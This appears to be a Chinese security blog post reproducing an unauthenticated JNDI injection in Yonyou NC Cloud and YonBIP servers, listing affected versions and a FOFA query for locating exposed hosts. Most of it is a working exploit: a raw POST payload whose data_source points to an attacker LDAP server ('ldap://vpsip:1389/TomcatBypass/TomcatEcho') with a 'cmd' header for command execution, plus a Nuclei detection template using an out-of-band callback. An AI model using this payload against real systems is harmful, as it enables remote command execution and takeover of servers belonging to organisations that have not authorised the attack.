Babing
Published on 2024-08-30 / 4 Visits
0
0

Y17-1用友-YonBIP-JNDI注入

Y17-1用友-YonBIP-JNDI注入

漏洞描述:

用友NC Cloud及YonBIP 系统PMCloudDriveProjectStateServlet.class接口处存在JNDI注入漏洞,未经身份验证的攻击者可通过此漏洞可以在服务端执行任意命令,获取服务器权限。

影响版本:

NCC2105
NCC2111
YonBIP高级版2207
YonBIP高级版2305

网站图片:

image.webp

网络测绘:

fofa语法:

FOFA:app=“用友-NC-Cloud”

漏洞复现:

payload:

POST /service/~pim/PMCloudDriveProjectStateServlet HTTP/1.1
Host: your-ip
cmd: whoami
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Connection: close

{
    "data_source":"ldap://vpsip:1389/TomcatBypass/TomcatEcho",
    "user":""
}

效果图:

Yaml模板

id: yonyou-NC-Cloud-JNDI

info:
  name: 用友NC Cloud及YonBIP PMCloudDriveProjectStateServlet JNDI注入漏洞
  author: WLF
  severity: high
  metadata: 
    fofa-query: app="用友-NC-Cloud"
variables:
  filename: "{{to_lower(rand_base(10))}}"
  boundary: "{{to_lower(rand_base(20))}}"
http:
  - raw:
      - |
        POST /service/~pim/PMCloudDriveProjectStateServlet HTTP/1.1
        Host: {{Hostname}}
        Accept-Encoding: gzip
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
        Content-Type: application/json
        Connection: close

        {
        "data_source":"ldap://{{interactsh-url}}",
        "user":""
        }

    matchers:
      - type: dsl
        dsl:
          - contains(interactsh_protocol, "dns")
        condition: and

Comment